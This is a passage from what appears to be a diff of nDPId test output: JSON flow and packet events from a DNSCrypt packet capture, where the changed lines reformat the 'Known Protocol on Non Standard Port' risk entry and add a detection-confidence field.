AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":225,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRf4Aub0RhNkKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":225,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhidAACgR63I0QeuBCgAAAQG72qsAwNq7Cm+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRf8gAL0RYAUKAAABMw8+QYLxAbsGBHqjxUQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":228,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRf8Aub0RhNgKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":228,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAIcRgBAAL0RQ8QKAAABMw8+QarCAbsCCDQmxUUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAHBAAwBvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":946739312106,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312106,"pkt":"REREREREZmZmZmZmCABFAAIcRgFAAL0RQ8MKAAABMw8+Qe0\/AbsCCDQmxUcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAHBAAwBvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":946739312130,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":946739312130,"pkt":"ZmZmZmZmRERERERECABFAADZ1MsAADURfjwzDz5BCgAAAQG7l5wAxS3cxUiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":946739312132,"pkt":"ZmZmZmZmRERERERECABFAADZ1MwAADURfjszDz5BCgAAAQG73XAAxegJxUaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAIcwbRAAL0RUGYKAAABLZm7YKO5EPcCCKvPMPgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbUgAL0RbKUKAAABLZm7YJQCEPcGBM6aMPUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA